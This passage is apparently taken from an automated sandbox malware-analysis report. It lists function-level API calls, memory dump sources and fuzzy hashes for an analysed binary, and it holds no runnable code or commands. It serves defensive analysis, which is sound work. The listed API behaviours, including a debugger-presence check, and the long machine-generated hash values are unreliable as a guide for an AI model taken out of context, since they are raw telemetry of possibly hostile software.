                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_$_memset
                                                                  • String ID:
                                                                  • API String ID: 1505330794-0
                                                                  • Opcode ID: a860e4e45315f750345a385a0e7ae8bb9a253238007e3e0f7ab6c9adeb69dde9
                                                                  • Instruction ID: f39a8f7024da8d0ac2b4738b99d14fd1d901d3bc7bef5d952b834193f60c023d
                                                                  • Opcode Fuzzy Hash: a860e4e45315f750345a385a0e7ae8bb9a253238007e3e0f7ab6c9adeb69dde9
                                                                  • Instruction Fuzzy Hash: C8319EB15157498FD720EF35D884697BBE8FB49308F000A3EF69A93241EB71A944DB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __FF_MSGBANNER.LIBCMT ref: 00EF5953
                                                                    • Part of subcall function 00EFA39B: __NMSG_WRITE.LIBCMT ref: 00EFA3C2
                                                                    • Part of subcall function 00EFA39B: __NMSG_WRITE.LIBCMT ref: 00EFA3CC
                                                                  • __NMSG_WRITE.LIBCMT ref: 00EF595A
                                                                    • Part of subcall function 00EFA3F8: GetModuleFileNameW.KERNEL32(00000000,00F953BA,00000104,00000004,00000001,00EF1003), ref: 00EFA48A
                                                                    • Part of subcall function 00EFA3F8: ___crtMessageBoxW.LIBCMT ref: 00EFA538
                                                                    • Part of subcall function 00EF32CF: ___crtCorExitProcess.LIBCMT ref: 00EF32D5
                                                                    • Part of subcall function 00EF32CF: ExitProcess.KERNEL32 ref: 00EF32DE
                                                                    • Part of subcall function 00EF8D58: __getptd_noexit.LIBCMT ref: 00EF8D58
                                                                  • RtlAllocateHeap.NTDLL(01270000,00000000,00000001,?,00000004,?,?,00EF1003,?), ref: 00EF597F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 1372826849-0
                                                                  • Opcode ID: e4ed85b9d7aa75bdfadf4eade14d4face5fc2b88bc632dde97b899620e823b5d
                                                                  • Instruction ID: b61dad51fc71f9a62a83ee80387103ed86cd4c5394cc0741b007dafca5fc474f
                                                                  • Opcode Fuzzy Hash: e4ed85b9d7aa75bdfadf4eade14d4face5fc2b88bc632dde97b899620e823b5d
                                                                  • Instruction Fuzzy Hash: C101D632301B0EDAE6192B34AC0167E32888FE2774F50202BF728BE191DEB08D004761
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: EA06
                                                                  • API String ID: 4104443479-3962188686
                                                                  • Opcode ID: 038b983d4636b5cd02d263298dab3cb74ea3ed9df7ddd4054228fffd755c9080
                                                                  • Instruction ID: 5fe45ff5e23da180df22037f9e2f06eba1ebe54999063f775839c7f3eb05645a
                                                                  • Opcode Fuzzy Hash: 038b983d4636b5cd02d263298dab3cb74ea3ed9df7ddd4054228fffd755c9080
                                                                  • Instruction Fuzzy Hash: 1041ADA2E041EC5BDF219B6598517FF7FE18B85320F2450B4E882F72C7D6228D8093E2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EDAD08
                                                                  • OleInitialize.OLE32(00000000), ref: 00EDAD85
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleInitialize
                                                                  • String ID:
                                                                  • API String ID: 3139323997-0
                                                                  • Opcode ID: ae7faa8f0228c79f44af9dff7abcfd4070449caacf7ca7d7a08dab368217fc1e
                                                                  • Instruction ID: 0996b0470ca7efddc680496d093615b503aee5127b74b967cc7055b60b5d7b01
                                                                  • Opcode Fuzzy Hash: ae7faa8f0228c79f44af9dff7abcfd4070449caacf7ca7d7a08dab368217fc1e
                                                                  • Instruction Fuzzy Hash: 556174B0829388CED795FF6EAD816557EE8EB5830471491ABD008C7273EB301405BF6A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • IsThemeActive.UXTHEME ref: 00EE5FEF
                                                                    • Part of subcall function 00EF359C: __lock.LIBCMT ref: 00EF35A2
                                                                    • Part of subcall function 00EF359C: DecodePointer.KERNEL32(00000001,?,00EE6004,00F28892), ref: 00EF35AE
                                                                    • Part of subcall function 00EF359C: EncodePointer.KERNEL32(?,?,00EE6004,00F28892), ref: 00EF35B9
                                                                    • Part of subcall function 00EE5F00: SystemParametersInfoW.USER32 ref: 00EE5F18
                                                                    • Part of subcall function 00EE5F00: SystemParametersInfoW.USER32 ref: 00EE5F2D
                                                                    • Part of subcall function 00EE5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EE526C
                                                                    • Part of subcall function 00EE5240: IsDebuggerPresent.KERNEL32 ref: 00EE527E
                                                                    • Part of subcall function 00EE5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00EE52E6
                                                                    • Part of subcall function 00EE5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00EE5366
                                                                  • SystemParametersInfoW.USER32 ref: 00EE602F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                  • String ID:
                                                                  • API String ID: 1438897964-0
                                                                  • Opcode ID: 783dabc921126f8a0748b1eec55fa181c769cdf39f905a037c7fe3863a8b17d8
                                                                  • Instruction ID: 284b97f1718f044bbd7daaf106cebf6dfc83cb4ce8556174cbc1e5404796ba0c
                                                                  • Opcode Fuzzy Hash: 783dabc921126f8a0748b1eec55fa181c769cdf39f905a037c7fe3863a8b17d8
                                                                  • Instruction Fuzzy Hash: A011CAB18283099BC710EF69EC0594ABBF8EF99350F00491FF044A72B1DBB0A945DF92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00EE3E72,?,?,?,00000000), ref: 00EE4327
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00EE3E72,?,?,?,00000000), ref: 00F20717
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 1640d152368f76b4bacde32a33ee0a2459429421833660ad7f6122fe4e444fef
                                                                  • Instruction ID: 9e5d5c27102cb522dc0b23e034487371ecf4108d541a08308c7ef1414f81a40d
                                                                  • Opcode Fuzzy Hash: 1640d152368f76b4bacde32a33ee0a2459429421833660ad7f6122fe4e444fef
                                                                  • Instruction Fuzzy Hash: 2C0196B014434DBEF3200E15CC8AFA67A9CEB01768F10C315FAE56A1D0C6B45C459B14
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EF593C: __FF_MSGBANNER.LIBCMT ref: 00EF5953
                                                                    • Part of subcall function 00EF593C: __NMSG_WRITE.LIBCMT ref: 00EF595A
                                                                    • Part of subcall function 00EF593C: RtlAllocateHeap.NTDLL(01270000,00000000,00000001,?,00000004,?,?,00EF1003,?), ref: 00EF597F
                                                                  • std::exception::exception.LIBCMT ref: 00EF101C
                                                                  • __CxxThrowException@8.LIBCMT ref: 00EF1031
                                                                    • Part of subcall function 00EF87CB: RaiseException.KERNEL32(?,?,?,00F8CAF8,?,?,?,?,?,00EF1036,?,00F8CAF8,?,00000001), ref: 00EF8820
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3902256705-0
                                                                  • Opcode ID: 0687d6443aef8ada6fff307986f422e22ef8836c2fdd1782fb486034b5c91975
                                                                  • Instruction ID: 5b4d8490f424931497d626bd9e161175e24a6279a822e870e3a66191344d9c1f
                                                                  • Opcode Fuzzy Hash: 0687d6443aef8ada6fff307986f422e22ef8836c2fdd1782fb486034b5c91975
                                                                  • Instruction Fuzzy Hash: E6F0A43560421DB6CB24BA58DD15AFE77EC9F02355F101456FA14B2292DFB18B80E6E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __lock_file_memset
                                                                  • String ID:
                                                                  • API String ID: 26237723-0
                                                                  • Opcode ID: 0545cbcc19a79782b5049e1e6c274a1bb57ccc31a2efce0ea6ba333028e23257
                                                                  • Instruction ID: a6d15da2c99aad290bb9dc918b3dcf43ad7447d8c57db5f7cf225e6401a43330
                                                                  • Opcode Fuzzy Hash: 0545cbcc19a79782b5049e1e6c274a1bb57ccc31a2efce0ea6ba333028e23257
                                                                  • Instruction Fuzzy Hash: 7F018872900A4CEBCF11AF65DD018BE7BA1AF50360F145126BB247B161D7318A11DF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EF8D58: __getptd_noexit.LIBCMT ref: 00EF8D58
                                                                  • __lock_file.LIBCMT ref: 00EF560B
                                                                    • Part of subcall function 00EF6E3E: __lock.LIBCMT ref: 00EF6E61
                                                                  • __fclose_nolock.LIBCMT ref: 00EF5616
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2800547568-0
                                                                  • Opcode ID: a9e48771c230fee207a051cdeaef8f2620766dc46bb785160570d5a32dd0059e
                                                                  • Instruction ID: fcb8fb7c1e1829939190ddf8a26015813a77fe7f4605b3300b01c02f4d658480
                                                                  • Opcode Fuzzy Hash: a9e48771c230fee207a051cdeaef8f2620766dc46bb785160570d5a32dd0059e
                                                                  • Instruction Fuzzy Hash: 7DF0B473A01B0D9BD7107B7589027BE77E16F61334F11A209A768BB1C1CB7C8A019F51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 00EF5EB4
                                                                  • __ftell_nolock.LIBCMT ref: 00EF5EBF
                                                                    • Part of subcall function 00EF8D58: __getptd_noexit.LIBCMT ref: 00EF8D58
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2999321469-0
                                                                  • Opcode ID: 1dca8f5ecfd4387f08eb3c37998cd193f53e06e1c0892446a9b2852ff8546385
                                                                  • Instruction ID: 4f706dafaac650f60932556167bc5db93cce166e2e03db6e86d09f7688f6feae
                                                                  • Opcode Fuzzy Hash: 1dca8f5ecfd4387f08eb3c37998cd193f53e06e1c0892446a9b2852ff8546385
                                                                  • Instruction Fuzzy Hash: 12F0A733A11A1D9ADB00BB7489037BE76D06F21331F216346A224BB1D1CF788A019B51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,?,?,00EE3BAB,00F60980,?,00F60980,?,?), ref: 00EE1266
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,?,?,00EE3BAB,00F60980,?,00F60980,?,?), ref: 00EE1299
                                                                    • Part of subcall function 00EE1364: _memmove.LIBCMT ref: 00EE13A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                  • String ID:
                                                                  • API String ID: 3033907384-0
                                                                  • Opcode ID: 01962d6c02e34d0caddcf96bd6f40ab281c533e67ad93e7b11ce00e1a64ab3fe
                                                                  • Instruction ID: 7cc6bfe16f35ba6bd45b03b8bcc61e01045108d8217e394d95fa00633f0ddf07
                                                                  • Opcode Fuzzy Hash: 01962d6c02e34d0caddcf96bd6f40ab281c533e67ad93e7b11ce00e1a64ab3fe
                                                                  • Instruction Fuzzy Hash: B501A2312051487FEB246A22DC46F7B3B9CEB85360F10806AFA05DD191DE719840D661
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e1f97a4ee9fdc1668a9b06a1c2c506bbeb0f745b1d31c089807fd172dc4abbbe
                                                                  • Instruction ID: 8b3182b5bc9bd68cd1e5ec20bea540e72d446044a6b0e96a92c753a1d68bb58e
                                                                  • Opcode Fuzzy Hash: e1f97a4ee9fdc1668a9b06a1c2c506bbeb0f745b1d31c089807fd172dc4abbbe
                                                                  • Instruction Fuzzy Hash: 2D61EC70600206DFCB10DF60D891ABAB7F5EF44310F19806AE916AB391D775EE82DB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 929de7da0d9574f754836503d26eaf91fb8cd3b21bc8175c6718921cd6b2e6b8
                                                                  • Instruction ID: 7a6fca2f1bf6503311c74676050adace5280311f1cd1227dd4e7e50604b3982e
                                                                  • Opcode Fuzzy Hash: 929de7da0d9574f754836503d26eaf91fb8cd3b21bc8175c6718921cd6b2e6b8
                                                                  • Instruction Fuzzy Hash: F651A131704608AFCB14EB64CD95EAE77E6AF85720F145099F816BB392CB30ED41DB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00EE41B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 887160e5f9dbd868af8de916388054410da8424dd755e0408a1a62eaabf50da3
                                                                  • Instruction ID: 14e91e5db6fa6980fd07b5d86d1f4e1bdc8b2570c66ebd40a098d5c3d8266f4a
                                                                  • Opcode Fuzzy Hash: 887160e5f9dbd868af8de916388054410da8424dd755e0408a1a62eaabf50da3
                                                                  • Instruction Fuzzy Hash: 3231A3B1A01699AFCF18CF2DC880A9DB7B1FF58314F159619E815A3750D770BD90CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 86cd0f51659f3abb66fa2dff679f130fc63467a4e84c12e628a3a08821a99e8b
                                                                  • Instruction ID: f49d5bcec07d5ae0b2a95b4dbe9e8db2d93541fc654f91c056ccb50c0bb7689a
                                                                  • Opcode Fuzzy Hash: 86cd0f51659f3abb66fa2dff679f130fc63467a4e84c12e628a3a08821a99e8b
                                                                  • Instruction Fuzzy Hash: A7210272A0471CEBCB149F61F884BBA7FB8FB50350F2184AAE485E2551EF3189E0E755
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00EE4B63
                                                                    • Part of subcall function 00EF547B: __wfsopen.LIBCMT ref: 00EF5486
                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00EE27AF,?,00000001), ref: 00EE49F4
                                                                    • Part of subcall function 00EE4ADE: FreeLibrary.KERNEL32(00000000), ref: 00EE4B18
                                                                    • Part of subcall function 00EE48B0: _memmove.LIBCMT ref: 00EE48FA
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                  • String ID:
                                                                  • API String ID: 1396898556-0
                                                                  • Opcode ID: 87fdc68f12ea539cdee1eda91fd1cbf2ef8be042cc052fe1326d24b29bf7a16d
                                                                  • Instruction ID: 10ea08f9c163595949348bd33d84d6ba4168721beb8566468aa65bf0fea759b5
                                                                  • Opcode Fuzzy Hash: 87fdc68f12ea539cdee1eda91fd1cbf2ef8be042cc052fe1326d24b29bf7a16d
                                                                  • Instruction Fuzzy Hash: 2C11C47265024DABCB14FB71DC16EAE76E99F40721F104429F549B62C2FF709A10AB98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
